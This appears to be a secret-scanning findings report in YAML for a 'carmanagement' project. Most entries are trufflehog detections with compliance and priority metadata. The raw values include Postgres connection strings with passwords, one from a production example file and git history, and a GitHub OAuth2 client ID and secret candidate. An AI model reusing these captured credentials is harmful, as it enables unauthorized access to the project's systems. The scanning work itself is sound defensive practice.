Files
carmanagement/results/summaries/findings.yaml
T
2026-05-21 12:35:49 -04:00

56691 lines
1.5 MiB
Plaintext

meta:
output_version: 1.0.0
jmo_version: 1.0.5
schema_version: 1.2.0
timestamp: '2026-05-21T06:36:10.198780Z'
scan_id: 202284b8-0052-4181-970d-ee2285144fcf
profile: ''
tools:
- checkov
- hadolint
- semgrep
- syft
- trivy
- trufflehog
- zap
target_count: 1
finding_count: 712
platform: Linux
findings:
- schemaVersion: 1.2.0
id: d818f4846421d653
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.env.docker.production.example
startLine: 0
message: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.env.docker.production.example
line: 9
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: false
Raw: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
RawV2: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: &id001
- control: '3.11'
title: Encrypt Sensitive Data at Rest
implementationGroup: IG1
- control: '5.4'
title: Restrict Administrator Privileges to Dedicated Administrator Accounts
implementationGroup: IG1
nistCsf2_0:
- &id002
function: PROTECT
category: PR.AC
subcategory: PR.AC-1
description: Identities and credentials are issued, managed, verified, revoked,
and audited
- &id003
function: PROTECT
category: PR.DS
subcategory: PR.DS-1
description: Data-at-rest is protected
pciDss4_0:
- &id004
requirement: 8.3.2
description: Strong cryptography for authentication credentials
priority: CRITICAL
- &id005
requirement: 8.2.1
description: Verify user identity before credential modification
priority: HIGH
mitreAttack:
- &id006
tactic: Credential Access
technique: T1552
techniqueName: Unsecured Credentials
subtechnique: T1552.001
subtechniqueName: Credentials in Files
- &id007
tactic: Initial Access
technique: T1078
techniqueName: Valid Accounts
subtechnique: ''
subtechniqueName: ''
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 35ed8d11af314afa
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.env.local
startLine: 0
message: postgresql://postgres:password@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.env.local
line: 1
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: false
Raw: postgresql://postgres:password@postgres:5432
RawV2: postgresql://postgres:password@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 48b308b8dd5acde8
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.env.docker.dev
startLine: 0
message: postgresql://postgres:password@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.env.docker.dev
line: 1
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: false
Raw: postgresql://postgres:password@postgres:5432
RawV2: postgresql://postgres:password@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1c16bda367ac0bd8
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.env.docker.test
startLine: 0
message: postgresql://postgres:password@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.env.docker.test
line: 1
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: false
Raw: postgresql://postgres:password@postgres:5432
RawV2: postgresql://postgres:password@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: deeba988a9ab6141
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c
startLine: 0
message: postgresql://postgres:password@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c
line: 1
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: true
Raw: postgresql://postgres:password@postgres:5432
RawV2: postgresql://postgres:password@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 381c867d67edf2e8
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208
startLine: 0
message: postgresql://postgres:change-me@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208
line: 7
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: false
Raw: postgresql://postgres:change-me@postgres:5432
RawV2: postgresql://postgres:change-me@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: edccc43a23cfabf6
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14
startLine: 0
message: postgresql://postgres:password@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14
line: 1
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: true
Raw: postgresql://postgres:password@postgres:5432
RawV2: postgresql://postgres:password@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: aae1f539799fb2de
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06
startLine: 0
message: postgresql://postgres:password@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06
line: 1
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: true
Raw: postgresql://postgres:password@postgres:5432
RawV2: postgresql://postgres:password@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 786bfda631317a71
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924
startLine: 0
message: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924
line: 7
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: false
Raw: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432
RawV2: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 595d2f235b05e737
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc
startLine: 0
message: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc
line: 9
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: true
Raw: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
RawV2: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3ed146267f450c31
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c
startLine: 0
message: postgresql://postgres:change-me@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c
line: 7
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: true
Raw: postgresql://postgres:change-me@postgres:5432
RawV2: postgresql://postgres:change-me@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2998e9823a9a5e07
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46
startLine: 0
message: postgresql://postgres:change-me@postgres:5432
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46
line: 10
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup postgres on 192.168.65.7:53: no such host'
VerificationFromCache: true
Raw: postgresql://postgres:change-me@postgres:5432
RawV2: postgresql://postgres:change-me@postgres:5432
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d6855b7ba77520b3
ruleId: GitHubOauth2
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz
startLine: 0
message: 52813b1d8ad9af510d85
title: GitHubOauth2 secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz
line: 10674
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 924
DetectorName: GitHubOauth2
DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize
applications to access GitHub's API on behalf of a user or organization. These
credentials include a client ID and client secret, which can be used to obtain
access tokens for accessing GitHub resources.
DecoderName: BASE64
Verified: false
VerificationFromCache: false
Raw: 52813b1d8ad9af510d85
RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/github/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 437a1c93140bc172
ruleId: GitHubOauth2
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz
startLine: 0
message: 52813b1d8ad9af510d85
title: GitHubOauth2 secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz
line: 9955
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 924
DetectorName: GitHubOauth2
DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize
applications to access GitHub's API on behalf of a user or organization. These
credentials include a client ID and client secret, which can be used to obtain
access tokens for accessing GitHub resources.
DecoderName: PLAIN
Verified: false
VerificationFromCache: false
Raw: 52813b1d8ad9af510d85
RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/github/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7029ffbb2c18937d
ruleId: GitHubOauth2
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz
startLine: 0
message: 52813b1d8ad9af510d85
title: GitHubOauth2 secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz
line: 6254
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 924
DetectorName: GitHubOauth2
DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize
applications to access GitHub's API on behalf of a user or organization. These
credentials include a client ID and client secret, which can be used to obtain
access tokens for accessing GitHub resources.
DecoderName: BASE64
Verified: false
VerificationFromCache: true
Raw: 52813b1d8ad9af510d85
RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/github/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 992176a363e3d8a9
ruleId: GitHubOauth2
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/apps/dashboard/.next/cache/webpack/server-production/0.pack
startLine: 0
message: 52813b1d8ad9af510d85
title: GitHubOauth2 secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/apps/dashboard/.next/cache/webpack/server-production/0.pack
line: 245909
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 924
DetectorName: GitHubOauth2
DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize
applications to access GitHub's API on behalf of a user or organization. These
credentials include a client ID and client secret, which can be used to obtain
access tokens for accessing GitHub resources.
DecoderName: PLAIN
Verified: false
VerificationFromCache: true
Raw: 52813b1d8ad9af510d85
RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/github/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c1bd932c91cd4cda
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/@types/node/http.d.ts
startLine: 0
message: http://abc:xyz@example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/@types/node/http.d.ts
line: 1790
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationFromCache: false
Raw: http://abc:xyz@example.com
RawV2: http://abc:xyz@example.com
Redacted: http://abc:********@example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 65c35953dedc7b57
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/@types/node/https.d.ts
startLine: 0
message: https://abc:xyz@example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/@types/node/https.d.ts
line: 428
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationFromCache: false
Raw: https://abc:xyz@example.com
RawV2: https://abc:xyz@example.com
Redacted: https://abc:********@example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f081eac965f118df
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/@types/node/url.d.ts
startLine: 0
message: https://123:xyz@example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/@types/node/url.d.ts
line: 722
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationFromCache: false
Raw: https://123:xyz@example.com
RawV2: https://123:xyz@example.com
Redacted: https://123:********@example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a18230c14354e278
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/@types/node/url.d.ts
startLine: 0
message: https://abc:xyz@example.com
title: URI secret
description: Potential secret detected by TruffleHog
